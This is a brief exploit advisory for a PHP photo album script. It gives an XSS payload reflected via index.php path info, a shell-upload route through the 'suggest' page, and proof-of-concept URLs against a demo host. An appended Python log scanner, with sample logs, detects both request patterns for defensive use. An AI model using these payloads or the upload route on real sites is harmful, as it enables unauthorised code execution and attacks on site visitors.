# Exploit Title: AZ Photo Album Script Multiple Vulnerabilities
# Date: 2012
# Author: Eyup CELIK
# Version: All versions
# Tested on: All versions are vulnerable
# Web Site: www.eyupcelik.com.tr

ISSUE

XSS can be performed through the input reflected by index.php, and a shell script can be uploaded through the suggest page.

Vulnerable Page: index.php (File Upload - XSS)

Example:
#" onmouseover=document.write("google.com") (For XSS)
index.php/?gazpart=suggest (For File Upload)

POC:
http://www.php4script.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20
http://www.php4script.com/demo/php-photo-album-script/index.php/?gazpart=suggest

Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
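The two request patterns above (an event handler injected into the path info of index.php, and a POST to the suggest page) can be spotted in web server logs. The following detector is an added example, not part of the advisory; the access-log lines are constructed in Apache combined format, and the path-info check assumes the application reflects everything after index.php/ into an HTML attribute, which is what the PoC URL relies on.

```python
import re
from urllib.parse import unquote, parse_qs

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2012:12:00:01 +0000] "GET /demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2012:12:00:07 +0000] "POST /demo/php-photo-album-script/index.php/?gazpart=suggest HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2012:12:01:00 +0000] "GET /demo/php-photo-album-script/index.php/?gazpart=view&id=3 HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2012:12:01:05 +0000] "GET /demo/php-photo-album-script/index.php/album%20one HTTP/1.1" 200 4400 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A quote or angle bracket followed by an on*= handler: an attribute breakout
# into an event handler, which is the shape of the PoC payload.
XSS_RE = re.compile(r'["\'<][^"\']*\bon[a-z]+\s*=', re.IGNORECASE)


def decode_target(target):
    """Percent-decode until stable so double-encoded payloads are also visible."""
    prev, cur = None, target
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur, errors="replace")
    return cur


def classify(line):
    """Return a finding record for one log line, or None if it does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    path, _, query = target.partition("?")
    findings = []
    # Anything after index.php/ is path info that the script reflects (assumption).
    if "index.php/" in path and XSS_RE.search(path.split("index.php/", 1)[1]):
        findings.append("xss_in_path_info")
    # A POST to the suggest page is the upload channel named in the advisory.
    if m.group("method") == "POST" and parse_qs(query).get("gazpart") == ["suggest"]:
        findings.append("upload_to_suggest")
    return {"ip": m.group("ip"), "ts": m.group("ts"), "findings": findings}


def scan(log_text):
    """Return only the parsed lines that carry at least one finding."""
    hits = (classify(line) for line in log_text.splitlines())
    return [h for h in hits if h and h["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], ", ".join(hit["findings"]))
```

Requests that merely browse albums (the two 198.51.100.9 lines) produce no finding; only the attribute breakout and the POST to gazpart=suggest are reported.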